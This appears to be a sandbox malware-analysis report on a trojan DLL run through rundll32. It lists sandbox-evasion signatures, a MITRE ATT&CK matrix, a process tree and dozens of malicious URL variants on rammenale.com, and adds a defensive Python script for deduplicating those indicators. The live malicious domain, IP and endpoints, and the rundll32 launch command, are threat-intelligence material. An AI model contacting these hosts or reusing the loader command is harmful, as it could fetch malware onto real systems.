Source: rundll32.exe, 00000005.00000002.3274732553.000000000843D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3274732553.0000000008469000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3274805413.0000000008499000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3274905046.0000000008B4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008DD1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008D71000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.000000000891D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275450644.000000000920D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.0000000009270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%\system32\dnsapi.dll,-103Pv\g
Source: rundll32.exe, 00000006.00000002.3274805413.000000000846E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXdJ
Source: rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(2
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F9E3741 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F9F2E75 GetProcessHeap
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F9E324C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F9EC07A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6F9E3741 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6F9E324C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6F9EC07A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 131.153.206.231 443
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Dll1.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F9E393B cpuid
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F9E3390 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
MITRE ATT&CK matrix, listed per tactic (a number in parentheses is the count badge the report attached to that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (111); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (11); Process Injection (111); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Rundll32 (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: System Time Discovery (1); Security Software Discovery (21); Virtualization/Sandbox Evasion (11); File and Directory Discovery (1); System Information Discovery (12); Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (text rendering of the graph widget): ID 1500782, sample Dll1.dll, start date 28/08/2024, architecture WINDOWS, score 80

Signatures attached to the sample node: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Sigma detected: rundll32 run dll from internet; Sigma detected: Execute DLL with spoofed extension
DNS/IP nodes: rammenale.com; 198.187.3.20.in-addr.arpa

Process tree:
  loaddll32.exe
    rundll32.exe  [signature: System process connects to network (likely due to code injection or exploit)]
    rundll32.exe
      rundll32.exe  -> rammenale.com (131.153.206.231, 443, 49704, 49705; SS-ASHUS, United States)
      rundll32.exe
    cmd.exe
      rundll32.exe
        rundll32.exe
        rundll32.exe
    2 other processes

Source | Detection | Scanner | Label
Dll1.dll | 32% | ReversingLabs | Win32.Trojan.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
URL | Detection | Scanner | Label
https://rammenale.com/J | 0% | Avira URL Cloud | safe
https://rammenale.com/K | 0% | Avira URL Cloud | safe
https://rammenale.com/for2/aclog.txtQ8 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpaC: | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp% | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtJ | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtPR | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp$q | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpent | 100% | Avira URL Cloud | malware
https://rammenale.com/M | 0% | Avira URL Cloud | safe
https://rammenale.com/for2/aclogI | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txthe | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpryh | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt4J | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtO | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtPg | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txte | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtf | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp4r | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp.( | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp60 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtd | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt- | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpent0 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtentg | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmprmh | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt4 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtent | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtag | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt( | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpo | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpq | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt: | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpk | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpz | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog& | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmps | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpmpf | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpt | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp6634-1003 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpC: | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt4p | 100% | Avira URL Cloud | malware
https://rammenale.com/ | 0% | Avira URL Cloud | safe
https://rammenale.com/for2/regit.tmph | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtentindowsINetCookies | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpE0 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt6634-1003 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpj | 100% | Avira URL Cloud | malware
https://rammenale.com/R# | 0% | Avira URL Cloud | safe
https://rammenale.com/for2/aclog.txt4r | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpd | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt49? | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtC: | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclogtxtH | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpY | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt&8 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt4er | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpPR | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpentindowsINetCookies | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtft | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtjx | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpU | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpV | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclogtxtB | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp4e | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtm | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtV~ | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclogtxt | 100% | Avira URL Cloud | malware
https://rammenale.com/Si | 0% | Avira URL Cloud | safe
https://rammenale.com/for2/aclog.txtr | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txts | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpG | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp5A | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpE | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtp | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp/ | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtWk | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp0 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpmp | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpR0 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp2 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtz | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtP; | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp4T | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp4P | 100% | Avira URL Cloud | malware
https://rammenale.com/D | 0% | Avira URL Cloud | safe
https://rammenale.com/for2/regit.tmp4 | 100% | Avira URL Cloud | malware
https://rammenale.com/1p | 0% | Avira URL Cloud | safe

Nearly every row above is one of two endpoints, https://rammenale.com/for2/aclog.txt and https://rammenale.com/for2/regit.tmp, followed by one to a few bytes that happened to sit next to the string in the memory dump (the ...C: and ...indowsINetCookies tails are fragments of neighbouring path strings); the 0%/safe rows are the bare origin plus a stray character. Use the two clean URLs, the domain and the IP as indicators, not the variants, and note that the "safe" verdict on the bare origin says nothing about the /for2/ paths.
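The URL table above lists dozens of near-duplicate strings because the memory-string scanner copies a URL together with whatever bytes follow it in the dump. The Python below is added here as an example; it is not part of the Joe Sandbox report or of the analysed sample. It collapses such a list to canonical endpoints without a list of known-good URLs, assuming only that a real endpoint is a long prefix shared by many strings while each noise tail is rare. The input is a constructed subset of the table plus one unrelated URL (example.invalid) to exercise the fallback; min_support and dominance are tunable assumptions, not values taken from the report.

```python
"""Collapse memory-string URL variants to canonical IOCs (added example)."""
from collections import Counter, defaultdict
from urllib.parse import urlsplit

# Constructed sample: a subset of the strings in the report's URL table, plus
# one unrelated URL (example.invalid, RFC 2606) to show the fallback path.
BASE = "https://rammenale.com/"
RAW_STRINGS = (
    [BASE + s for s in ("", "J", "K", "M")]
    + [BASE + "for2/aclog" + s for s in ("", "I", "&")]
    + [BASE + "for2/aclog.txt" + s for s in (
        "", "Q8", "J", "PR", "4J", "4p", "4r", "ent", "entg",
        "entindowsINetCookies", "6634-1003", "O", "he", "Pg", "e", "f", "d",
        "-", "ag", "(", ":")]
    + [BASE + "for2/regit.tmp" + s for s in (
        "", "aC:", "%", "ent", "ent0", "entindowsINetCookies", "4r", "4T",
        "4P", "6634-1003", "C:", "q", "k", "z", "s", "o", "h")]
    + ["https://example.invalid/one-off"]
)


def prefix_support(strings):
    """support[p] = how many input strings start with prefix p (every prefix)."""
    support = Counter()
    for s in strings:
        for i in range(1, len(s) + 1):
            support[s[:i]] += 1
    return support


def largest_child(support):
    """largest[p] = the biggest support among p's one-character extensions."""
    largest = defaultdict(int)
    for p, n in support.items():
        if len(p) > 1:
            largest[p[:-1]] = max(largest[p[:-1]], n)
    return largest


def canonicalize(s, support, largest, min_support=2, dominance=0.3):
    """Trim s to the longest prefix that still looks like a shared URL.

    Walk s one character at a time and stop when the next prefix is
    (almost) unique, or when the current prefix fans out into many weak
    branches, i.e. no continuation carries `dominance` of its support.
    Both thresholds are heuristic assumptions.
    """
    node = ""
    for i in range(1, len(s) + 1):
        child = s[:i]
        if support[child] < min_support:
            break  # the tail from here on is unique: adjacent memory bytes
        if node and largest[node] < dominance * support[node]:
            break  # node is a real endpoint; everything below it is noise
        node = child
    parts = urlsplit(s)
    origin = f"{parts.scheme}://{parts.netloc}/"
    # Never trim into the origin; a lone unrelated URL is kept verbatim.
    return node if node.startswith(origin) else s


def collapse(strings, min_support=2, dominance=0.3):
    """Map every raw string to its canonical form; return {canonical: count}."""
    support = prefix_support(strings)
    largest = largest_child(support)
    return Counter(canonicalize(s, support, largest, min_support, dominance)
                   for s in strings)


if __name__ == "__main__":
    for url, n in collapse(RAW_STRINGS).most_common():
        print(f"{n:3d}  {url}")
```

With dominance at 0.3 the walk descends through a directory only if one entry beneath it holds at least 30% of the strings, so a directory holding four or more equally common files would be reported at the directory level instead; lower the value if that matters, and raise min_support when the dump contains several copies of the same noisy string.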
Name | IP | Active | Malicious | Antivirus Detection | Reputation
rammenale.com | 131.153.206.231 | true | true | | unknown
198.187.3.20.in-addr.arpa | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://rammenale.com/for2/regit.tmp | true | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txt | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://rammenale.com/for2/regit.tmpent | rundll32.exe, 00000009.00000002.3272263359.0000000002C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369942393.0000000003645000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272727200.0000000003645000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtPR | rundll32.exe, 00000006.00000002.3273575831.0000000002A60000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/M | rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://rammenale.com/for2/aclog.txtJ | rundll32.exe, 00000006.00000002.3274805413.0000000008453000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmp$q | rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/K | rundll32.exe, 00000006.00000002.3274805413.0000000008481000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://rammenale.com/for2/aclog.txtQ8 | rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/J | rundll32.exe, 00000005.00000002.3274732553.0000000008450000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://rammenale.com/for2/regit.tmpaC: | loaddll32.exe, 00000000.00000002.2084984797.0000000000A80000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmp% | rundll32.exe, 0000000A.00000002.3272127824.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtO | rundll32.exe, 00000005.00000002.3272308201.00000000026E3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txthe | rundll32.exe, 00000005.00000002.3274732553.0000000008423000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclogI | rundll32.exe, 00000005.00000002.3274732553.0000000008486000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtPg | rundll32.exe, 00000005.00000002.3274732553.0000000008486000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmp4r | rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txt4J | rundll32.exe, 00000005.00000002.3274732553.0000000008469000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpryh | rundll32.exe, 00000009.00000002.3274905046.0000000008AD2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtf | rundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txte | rundll32.exe, 00000005.00000002.3272308201.000000000267A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3274805413.00000000084B7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmp.( | rundll32.exe, 00000009.00000002.3274905046.0000000008AD2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmp60 | rundll32.exe, 0000000C.00000002.3272566960.00000000035DA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtd | rundll32.exe, 00000006.00000002.3274805413.0000000008453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpent0 | rundll32.exe, 0000000A.00000002.3272127824.0000000002E60000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txt- | rundll32.exe, 00000005.00000002.3274732553.0000000008486000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmprmh | rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txt( | rundll32.exe, 00000006.00000002.3274805413.00000000084B7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtag | rundll32.exe, 00000005.00000002.3274732553.0000000008486000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtent | rundll32.exe, 00000006.00000002.3272227188.0000000002610000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txt4 | rundll32.exe, 00000006.00000002.3274805413.0000000008481000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.000000000891D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtentg | rundll32.exe, 00000005.00000002.3272308201.00000000026E3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpo | rundll32.exe, 0000000A.00000002.3272127824.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpq | rundll32.exe, 0000000A.00000002.3272127824.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog | rundll32.exe, 0000000B.00000002.3274421722.0000000004D30000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txt: | rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpk | rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txt4j | rundll32.exe, 00000005.00000002.3274732553.0000000008450000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://rammenale.com/for2/aclog& | rundll32.exe, 00000006.00000002.3274805413.00000000084B7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtF | rundll32.exe, 00000005.00000002.3272308201.000000000267A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://rammenale.com/for2/regit.tmpmpf | rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpz | rundll32.exe, 00000009.00000002.3274905046.0000000008B5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmps | rundll32.exe, 0000000A.00000002.3273620140.0000000003150000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272288324.0000000003430000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpt | rundll32.exe, 0000000C.00000003.2369942393.0000000003645000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272727200.0000000003645000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpC: | rundll32.exe, 00000003.00000002.2056608367.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2056574094.0000000003360000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272128849.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272263359.0000000002C10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3273461533.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3272127824.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272566960.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272431562.0000000003480000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txt6634-1003 | rundll32.exe, 00000005.00000002.3274732553.0000000008423000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3274805413.0000000008453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.00000000088A3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/ | rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://rammenale.com/for2/regit.tmp6634-1003 | rundll32.exe, 00000009.00000002.3274905046.0000000008AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008D53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275204855.00000000091F3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txt4p | rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmph | rundll32.ex, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtentindowsINetCookies | rundll32.exe, 00000005.00000002.3272308201.00000000026E3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpE0 | rundll32.exe, 0000000A.00000002.3272127824.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpj | rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/R# | rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://rammenale.com/for2/regit.tmpd | rundll32.exe, 00000009.00000002.3274905046.0000000008AD2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
